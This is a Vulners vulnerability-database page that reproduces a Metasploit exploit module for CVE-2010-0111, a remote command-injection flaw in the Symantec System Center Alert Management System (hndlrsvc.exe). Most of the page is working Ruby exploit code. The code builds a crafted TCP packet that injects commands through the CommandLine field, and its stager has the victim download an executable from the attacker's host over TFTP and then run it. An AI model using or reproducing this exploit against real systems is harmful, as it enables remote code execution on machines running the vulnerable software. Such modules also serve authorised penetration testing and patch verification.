Lucene search
K

Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution

🗓️ 19 Aug 2011 18:35:29Reported by MC <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 33 Views

Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution in Symantec AntiVirus Corporate Edition 8.0 - 10.1.7 allows remote command-injection due to inadequate input sanitization

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2010-0111
29 May 201815:50
circl
Check Point Advisories
Symantec Antivirus Intel Alert Handler Service Denial of Service (CVE-2010-0111)
20 Feb 201100:00
checkpoint_advisories
CVE
CVE-2010-0111
31 Jan 201120:00
cve
Cvelist
CVE-2010-0111
31 Jan 201120:00
cvelist
NVD
CVE-2010-0111
31 Jan 201121:00
nvd
OpenVAS
Symantec Intel Alert Management System Multiple Vulnerabilities
7 Feb 201100:00
openvas
OpenVAS
Symantec Intel Alert Management System Multiple Vulnerabilities
7 Feb 201100:00
openvas
Prion
Code injection
31 Jan 201121:00
prion
Prion
Information disclosure
31 Jan 201121:00
prion
securityvulns
TELUS Security Labs VR - Symantec Antivirus Intel Alert Handler Service Denial of Service
31 Jan 201100:00
securityvulns
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution',
      'Description'    => %q{
          Symantec System Center Alert Management System is prone to a
        remote command-injection vulnerability because the application fails
        to properly sanitize user-supplied input.  This is part of Symantec
        AntiVirus Corporate Edition 8.0 - 10.1.7.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['OSVDB', '66807'],
          ['BID', '41959'],
          ['CVE', '2010-0111'],
          ['URL', 'http://www.foofus.net/~spider/code/AMS2_072610.txt'],
        ],
      'Targets'       =>
        [
          [ 'Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            }
          ]
        ],
      'Privileged' => true,
      'Platform' => 'win',
      'DefaultTarget' => 0,
      'DisclosureDate' => '2010-07-26'))

    register_options([
        Opt::RPORT(38292),
        OptString.new('CMD', [ false, 'Execute this command instead of using command stager', ""]),
        OptAddress.new('LHOST', [ false, 'The listen IP address from where the victim downloads the payload' ])
      ])
  end

  def windows_stager

    @pl = generate_payload_exe
    @tftp = Rex::Proto::TFTP::Server.new
    payload_name = "#{Rex::Text.rand_text_alpha_upper(11)}.exe"
    @tftp.register_file(payload_name,@pl,true)
    @tftp.start
    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
    execute_command("tftp -i #{datastore['lhost']} GET #{payload_name}")
    print_status("Attempting to execute the payload...")
    execute_command(payload_name)
  end

  def execute_command(cmd, opts = {})

    connect
    if ( cmd.length > 128 )
      fail_with(Failure::Unknown, "Command strings greater then 128 characters will not be processed!")
    end

    string_uno  = Rex::Text.rand_text_alpha_upper(11)
    string_dos  = Rex::Text.rand_text_alpha_upper(rand(4) + 5)

    packet =  "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00"
    packet << "\x02\x00\x95\x94\xc0\xa8\x02\x64\x00\x00\x00\x00\x00\x00\x00\x00"
    packet << "\xe8\x03\x00\x00"
    packet << 'PRGXCNFG'
    packet << "\x10\x00\x00\x00"
    packet << "\x00\x00\x00\x00\x04"
    packet << 'ALHD\F'
    packet << "\x00\x00\x01\x00\x00"
    packet << "\x00\x01\x00\x0e\x00"
    packet << 'Risk Repaired'
    packet << "\x00\x25\x00"
    packet << 'Symantec Antivirus Corporate Edition'
    packet << "\x00\xf9\x1d\x13\x4a\x3f"
    packet << [string_uno.length + 1].pack('v') + string_uno
    packet << "\x00\x08\x08\x0a"
    packet << "\x00" + 'Risk Name'
    packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
    packet << "\x00" + string_dos
    packet << "\x00\x08\x0a\x00"
    packet << 'File Path'
    packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
    packet << "\x00" + string_dos
    packet << "\x00\x08\x11\x00"
    packet << 'Requested Action'
    packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
    packet << "\x00" + string_dos
    packet << "\x00\x08\x0e\x00"
    packet << 'Actual Action'
    packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
    packet << "\x00" + string_dos
    packet << "\x00\x08\x07\x00"
    packet << 'Logger'
    packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
    packet << "\x00" + string_dos
    packet << "\x00\x08\x05\x00"
    packet << 'User'
    packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
    packet << "\x00" + string_dos
    packet << "\x00\x08\x09\x00"
    packet << 'Hostname'
    packet << "\x00\x0e\x00" + [string_uno.length + 1].pack('v') + string_uno
    packet << "\x00\x08\x13\x00"
    packet << 'Corrective Actions'
    packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
    packet << "\x00" + string_dos
    packet << "\x00\x00\x07\x08\x12\x00"
    packet << 'ConfigurationName'
    packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')
    packet << "\x00" + cmd
    packet << "\x00\x08\x0c\x00"
    packet << 'CommandLine'
    packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')
    packet << "\x00" + cmd
    packet << "\x00\x08\x08\x00"
    packet << 'RunArgs'
    packet << "\x00\x04\x00\x02\x00"
    packet << "\x20\x00\x03\x05\x00"
    packet << 'Mode'
    packet << "\x00\x04\x00\x02\x00\x00\x00"
    packet << "\x0a\x0d\x00"
    packet << 'FormatString'
    packet << "\x00\x02\x00\x00\x00\x08\x12\x00"
    packet << 'ConfigurationName'
    packet << "\x00\x02\x00\x00\x00\x08\x0c\x00"
    packet << 'HandlerHost'
    packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
    packet << "\x00" + string_dos
    packet << "\x00" * packet.length

    sock.put(packet)

    select(nil,nil,nil,3)
    disconnect
  end

  def exploit

    unless datastore['CMD'].blank?
      print_status("Executing command '#{datastore['CMD']}'")
      execute_command(datastore['CMD'])
      return
    end

    case target['Platform']
      when 'win'
        if datastore['LHOST'].blank?
          fail_with(Failure::Unknown, 'If no custom CMD is set, LHOST is required.')
        end
        windows_stager
      else
        fail_with(Failure::Unknown, 'Target not supported.')
    end

    handler
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation